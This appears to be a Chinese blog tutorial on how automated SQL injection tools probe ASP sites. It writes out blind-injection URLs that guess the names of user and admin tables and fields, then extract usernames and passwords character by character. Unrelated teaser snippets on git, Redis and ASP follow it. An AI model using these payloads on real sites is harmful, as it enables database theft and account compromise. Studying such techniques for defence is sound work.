前面已经讲了关于是否存在注入点的说明.
现在讲下关于阿D注入和明小子检测存在注入猜表猜字段的原理.(使用工具一定要知道工具原理,方便后期自己完善/开发工具)
1.猜表的方法:
http://xxx.com/ProductShow.asp?articleid=143 and exists(select * from [user]) //查询是否存在user表
http://xxx.com/ProductShow.asp?articleid=143 and exists(select * from [admin]) //查询是否存在admin表
2.猜字段的方法:
http://xxx.com/ProductShow.asp?articleid=143 and exists(select username from [user]) //查询在user表是否存在username字段
http://xxx.com/ProductShow.asp?articleid=143 and exists(select password from [user]) //查询在user表是否存在password字段
3.逐个记录的获取和暴库
(1).先查询user表第一个记录中username的字段长度
http://xxx.com/ProductShow.asp?articleid=143 and (select top 1 len(username ) from [user])=1 //测试第一个记录用户名长度是不是1
http://xxx.com/ProductShow.asp?articleid=143 and (select top 1 len(username ) from [user])=2 //测试第一个记录用户名长度是不是2
.........直到测试正确
(2).从上面记录到第一条记录的username的长度(假设是5),开始猜测这个username5位到底是什么,方法就是1位1位的猜测,毕竟
ASCII码不多
http://xxx.com/ProductShow.asp?articleid=143 and (select top 1 asc(mid(user_name ,1,1)) from [user])=97 //测试username第1位是不是a(ASCII中97是字母a)
http://xxx.com/ProductShow.asp?articleid=143 and (select top 1 asc(mid(user_name ,2,1)) from [user])=98 //测试username第2位是不是b(ASCII中98是字母b)
.........直到测试正确
通过工具循环测试很快完成检测整个表中的所有记录
Application 对象用于存储和访问来自任意页面的变量,类似 Session 对象。不同之处在于所有的用户分享一个 Application 对象,而 session 对象和用户的关系是一一对应的。很多的书籍中介绍的Application对象都喜欢以统计在线人数来介绍Application 对象...
1.远程仓库的协作模式开发者把自己最新的版本推到线上仓库,同时把线上仓库的最新代码,拉到自己本地即可2.注册git帐号国外: http://www.github.com国内: http://git.oschina.net2.在码云创建项目,不要初始化readmegit push https://gi...
git pull https://git.oschina.net/392223903/learn.git master 换为您的git地址...
public static string GetMD5(string str) { //创建MD5对象 MD5 md5 = MD5.C...
首先网页全部是纯静态的文件,本地测试正常访问,服务器端无法加载CSS,并且无法查看CSS文件的内容。 解决方案:关闭网站的压缩->>静态压缩和动态压缩...
1.文件redis-2.6.14.tar.gz的上传 /home/john/创建rdtar文件夹 上传redis-2.6.14.tar.gz至rdtar文件夹 2.解压文件 cd /home/john/rdtar tar &n...